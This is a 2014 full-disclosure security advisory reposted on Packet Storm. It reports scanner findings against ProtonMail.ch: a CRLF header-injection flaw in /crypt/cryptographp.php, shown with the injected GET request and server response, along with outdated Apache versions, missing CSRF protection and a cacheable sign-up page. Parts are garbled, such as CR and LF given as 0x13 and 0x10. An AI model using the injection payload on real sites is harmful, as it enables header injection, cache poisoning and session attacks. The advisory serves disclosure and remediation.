exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProtonMail.ch Header Injection / CSRF

ProtonMail.ch Header Injection / CSRF
Posted May 30, 2014
Authored by Juan Carlos Garcia, Francisco Moraga

ProtonMail.ch suffers from cross site request forgery, header injection, and out of date software vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, vulnerability, csrf
SHA-256 | 3d088ba11847cc70c4f57d4cfaf4266199b8c8da68a1d4fbf240d3513b40af99

ProtonMail.ch Header Injection / CSRF

Change Mirror Download
SecurityAdvisory
----------------


Time Line Vulnerability
-------------------------------


-Day 05-05-2014 Security Advisory => No response


-Days 08 12 19-05-2014 Multiples Advisories => No Response


-Day 20-05-2014 Full Disclosure



Alerts summary
********************


-CRLF injection/HTTP response splitting

/crypt/cryptographp.php
cfg


-Apache 2.x version older than 2.2.6
Web Server


-Apache 2.x version older than 2.2.8
Web Server


-Apache 2.x version older than 2.2.9
Web Server


-Apache httpd remote denial of service
Web Server


-HTML form without CSRF protection

/blog
/blog/transparency-report
/blog/wp-login.php
/blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e)
/crypt
/lander
/login.php
/report_bug.php
/sign_up.php



-Apache 2.x version older than 2.2.10

Web Server


-Clickjacking: X-Frame-Options header missing

Web Server


-Sensitive page could be cached

/sign_up.php (a18aae949b9855b60506dc83164afe7f)



-Session Cookie without HttpOnly flag set
/



-TRACE method is enabled

Web Server



-Broken links

/css/bootstrap.css
/css/bs.css
/pages/contact_us.php
/pages/mit_license.php
Password type input with autocomplete enabled
/blog/wp-login.php




I. VULNERABILITY
-------------------------


The ASAP-Sec Penetration Testers just explain faults exposed in the title


#Title: ProtonMail.ch suffers from a CRLF injection-HTTP response
splitting / Apache 2.x version older than 2.2.6 -X.8 -X.9.- 2.2.10 /
httpd RemoteDoS / CSRF


#Vendor:https://protonmail.ch:443/


#Author:Juan Carlos García and Francisco Moraga


#Follow us : http://www.highsec.es ||| Twitter:@secnight / @btshell1





II. DESCRIPTION
-------------------------


-ProtonMail is incorporated in Switzerland and their servers are located
in Switzerland.


-They are outside of US and EU jurisdiction and all user data is
protected by strict Swiss privacy laws.

Because of our end-to-end encryption, They think that :

"Your data is already secure and encrypted by the time it reaches our
servers. We have no access to your messages, and since we cannot decrypt
them, we cannot share them with third parties".


-ProtonMail's segregated authentication and decryption system means
logging into a ProtonMail account that requires two passwords.


-The first password is used to authenticate the user and retrieve the
correct account. After that, encrypted data is sent to the user.


-The second password is a decryption password which is never sent to us.
It is used to decrypt the user’s data in the browser so we never have
access to the decrypted data

or the decryption password.


-For this reason, we are also unable to do password recovery.


-If you forget your decryption password, we cannot recover your data.




By theWay, ASAP-SEC are Verifiying this information... Let's go to the
business ;)





III- Vulnerabilities
---------------------


CRLF injection / HTTP response splitting
****************************************


This script is possibly vulnerable to CRLF injection attacks.

HTTP headers have the structure "Key:

Value", where each line is separated by the CRLF combination.

If the user input is injected into the value section without properly
escaping/removing

CRLF characters it is possible to alter the HTTP headers structure.

HTTP Response Splitting is a "new" application attack technique which
enables

various new attacks such as web cache poisoning,cross user defacement,

hijacking pages with sensitive user information and cross-site scripting
(XSS).


The attacker sends a single HTTP request that forces the web server to
form an output stream,

which is then interpreted by the target as two HTTP responses instead of
one response.


Affected items
------------------

/crypt/cryptographp.php



The impact of this vulnerability
----------------------------------

Is it possible for a remote attacker to inject custom HTTP headers.

For example, an attacker can inject session cookies or HTML code.

This may conduct to vulnerabilities like XSS (cross-site scripting) or
session fixation.




How to fix this vulnerability
------------------------------------


You need to restrict CR(0x13) and LF(0x10)


From

the user input

or

properly encode the output

in

order to prevent the injection

of

custom HTTP headers.




Attack details
--------------------

URL encoded GET input cfg was set to
<SomeCustomInjectedHeader:injected_by_secnight



Injected header found:

SomeCustomInjectedHeader: injected_by_secnight



GET
/crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight





HTTP/1.0 302 Found

Date: Wed, 28 May 2014 15:33:55 GMT

Server: Apache/2.2.3 (CentOS)

X-Powered-By: PHP/5.3.28

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0

Pragma: no-cache

Set-Cookie: cryptcookietest=1

Location: cryptographp.inc.php?cfg=

SomeCustomInjectedHeader: injected_by_secnight&sn=PHPSESSID&

Strict-Transport-Security: max-age=15768000;includeSubDomains

Content-Length: 0

Connection: close

Content-Type: text/html



How to fix this vulnerability
-----------------------------


You need to restrict CR(0x13) and LF(0x10) from the user

input or properly encode the output in order to prevent

the injection of custom HTTP headers.





Variant 1
-----------


GET
/crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_asapsec
HTTP/1.1

Referer: https://protonmail.ch:443/

Cookie: PHPSESSID=afaj9rt84m3oevgtld6thfe9l4; cryptcookietest=1

Host: protonmail.ch

Connection: Keep-alive


Response
----------


HTTP/1.0 302 Found

Date: Wed, 28 May 2014 15:33:55 GMT

Server: Apache/2.2.3 (CentOS)

X-Powered-By: PHP/5.3.28

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0

Pragma: no-cache

Set-Cookie: cryptcookietest=1

Location: cryptographp.inc.php?cfg=

SomeCustomInjectedHeader: injected_by_wvs&sn=PHPSESSID&

Strict-Transport-Security: max-age=15768000;includeSubDomains

Content-Length: 0

Connection: close

Content-Type: text/html






Apache 2.x version older than 2.2.10
**************************************


Fixed in Apache httpd 2.2.10: mod_proxy_ftp globbing XSS CVE-2008-2939

A flaw was found in the handling of wildcards in the path of a FTP URL
with mod_proxy_ftp.

If mod_proxy_ftp is enabled to support FTP-over-HTTP, requests
containing globbing characters could lead to cross-site scripting (XSS)
attacks.

Affected Apache versions (2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3,
2.2.2, 2.2.0).




Apache httpd remote denial of service
*************************************


Vulnerability description
------------------------------


A denial of service vulnerability has been found in the way the multiple

overlapping ranges are handled by the Apache HTTPD server:




http://seclists.org/fulldisclosure/2011/Aug/175



An attack tool is circulating in the wild. Active use of this tools has
been observed. The attack can be done remotely

and with a modest number of requests can cause very significant memory
and CPU usage on the server.


Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through
2.2.19).



How to fix this vulnerability
-----------------------------
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later),
available from the Apache HTTP Server Project Web site.





Web references
--------------
CVE-2011-3192








Sensitive page could be cached
******************************


Vulnerability description
-----------------------


This page contains possible sensitive information (e.g. a password
parameter)

and could be potentially cached. Even in secure SSL channels sensitive
data could

be stored by intermediary proxies and SSL terminators. To prevent this,
a Cache-Control header should be specified.

This vulnerability affects


/sign_up.php (a18aae949b9855b60506dc83164afe7f).


GET /sign_up.php?username=urvimsoj HTTP/1.1

Pragma: no-cache

Referer: https://protonmail.ch/lander/


Response
----------

HTTP/1.0 200 OK

Date: Sun, 18 May 2014 19:27:10 GMT

Server: Apache/2.2.3 (CentOS)

X-Powered-By: PHP/5.3.28

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0

Pragma: no-cache

Strict-Transport-Security: max-age=15768000;includeSubDomains

Connection: close

Content-Type: text/html

Content-Length: 8285




HTML form without CSRF protection
********************************


Vulnerability description
------------------------------


Cross-site request forgery, also known as a one-click attack or session
riding
and abbreviated as CSRF or XSRF, is a type of malicious exploit of a
website
whereby unauthorized commands are transmitted from a user that the
website trusts.

Penetration Tester (Authors) found a HTML form with no apparent CSRF
protection implemented. Consult details for more information about the
affected HTML form.


Affected items
---------------

/blog
/blog/transparency-report
/blog/wp-login.php
/blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e)
/crypt
/lander
/login.php
/report_bug.php
/sign_up.php



The impact of this vulnerability
--------------------------------


An attacker may force the users of a web application to execute actions
of the attacker's choosing.

A successful CSRF exploit can compromise end user data and operation in
case of normal user.

If the targeted end user is the administrator account, this can
compromise the entire web application.




How to fix this vulnerability
-----------------------------


Check if this form requires CSRF protection and implement CSRF
countermeasures if necessary.



CREDITS
-------------------------

This vulnerability has been discovered

by Juan Carlos García(@secnight)

and

Francisco Moraga (@btshell)




VII. LEGAL NOTICES
-------------------------

The Authors accepts no responsibility for any damage
caused by the use or misuse of this information.








































































Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close